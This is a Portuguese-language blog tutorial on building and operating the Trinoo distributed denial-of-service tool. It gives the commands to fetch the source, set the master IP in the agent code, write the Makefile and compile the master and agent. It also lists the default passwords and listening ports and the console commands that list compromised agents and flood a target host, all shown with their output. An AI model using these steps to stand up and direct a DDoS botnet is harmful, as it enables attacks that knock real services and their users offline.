TRINOO

Diagrama de funcionamento:

Atacante -> Master -> Daemon -> Alvo

1 – Prepare o ambiente para a compilação do trinoo

mkdir /usr/local/src/trinoo
cd /usr/local/src/trinoo

2 – Baixe o código fonte do trinoo

wget http://packetstormsecurity.nl/distributed/trinoo.tgz

3 – Descompacte o codigo fonte do programa

tar -xzvf trinoo.tgz

COMPILANDO O PROGRAMA MASTER (SERVIDOR)

4 – Entre no diretório master

cd master

5 – Compile o master

make

COMPILANDO O PROGRAMA AGENTE (CLIENTE)

6 – Entre no diretório principal dos fontes do trinoo

cd /usr/local/src/trinoo

7 – Copie alguns arquivos do diretário master para o diretório daemon

cp master/bf_tab.h master/blowfish.c master/blowfish.h daemon/

8 – Entre no diretório daemon

cd daemon

9 – Edite o arquivo do agente ns.c

vi daemon/ns.c

* Procure a seguinte entrada dentro o arquivo

char *master[] = {
  "129.237.122.40",
  "207.228.116.19",
  "209.74.175.130",
  NULL

* Modifique esta entrada para trabalhar com o ip do servidor master

char *master[] = {
  "192.168.0.1",
   NULL

10 – Crie um arquivo Makefile dentro do diretório daemon

vi Makefile

LIBS=   -lcrypt
ns: ns.c blowfish.c
	gcc -o ns ns.c blowfish.c ${LIBS}
	strip ns

ATENÇÃO: Utilize TAB no inicio das linhas 3 e 4.

11 – Compile o agente

make

TESTANDO

12 – RODANDO O PROGRAMA MASTER NO SERVIDOR

– Rode o programa master no servidor – Entre com a senha “gOrave”

./master
?? gOrave
trinoo v1.07d2+f3+c [May 17 2007:17:04:32]

13 – Veja se o programa está escutando no servidor

– Checando a porta de comunicação Atacante para Master

netstat -nl | grep 27665
tcp        0      0 0.0.0.0:27665           0.0.0.0:*

– Checando a porta de comunicação Daemon/Agente para Master

netstat -nl | grep 31335
udp        0      0 0.0.0.0:31335           0.0.0.0:*

14 – RODANDO O PROGRAMA DAEMON/AGENTE NOS CLIENTES

./ns

– Checando a porta de comunicação Master para Daemon/Agente

netstat -nl | grep 27444
udp        0      0 0.0.0.0:27444           0.0.0.0:*

FAZENDO O ATAQUE

15 – Conecte-se na maquina Master Entre com a senha “betaalmostdone”

telnet 192.168.0.1 27665

Trying 192.168.0.1...
Connected to localhost.
Escape character is '^]'.
betaalmostdone
trinoo v1.07d2+f3+c..[rpm8d/cb4Sx/]

trinoo>

16 – Comandos do trinoo

– Exibir maquinas com agentes instalados

trinoo> bcast

Listing Bcasts.
192.168.0.130
192.168.0.124

End. 1 Bcasts total.

– Mandar agentes atacarem um host

trinoo> dos 192.168.0.222

DoS: Packeting 192.168.0.222.

– Mandar agentes pararem de atacar

trinoo> mstop

– Enviando pedido de ping para agentes ativos nos hosts

trinoo> mping

mping: Sending a PING to every Bcasts.
trinoo> PONG 1 Received from 192.168.0.130
PONG 2 Received from 192.168.0.124

– Matar todos os agentes ativos no hosts

trinoo> mdie killme

mdie: Disabling Bcasts.

– Matar o programa master no servidor

trinoo> die

Shutting down.
NOTICE: Better restart me?
Connection closed by foreign host.

+ Sobre – Documentação feita pelo desenvolvedor

http://staff.washington.edu/dittrich/misc/trinoo.analysis.txt

+ Sobre ataques DDoS

http://staff.washington.edu/dittrich/misc/ddos/

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s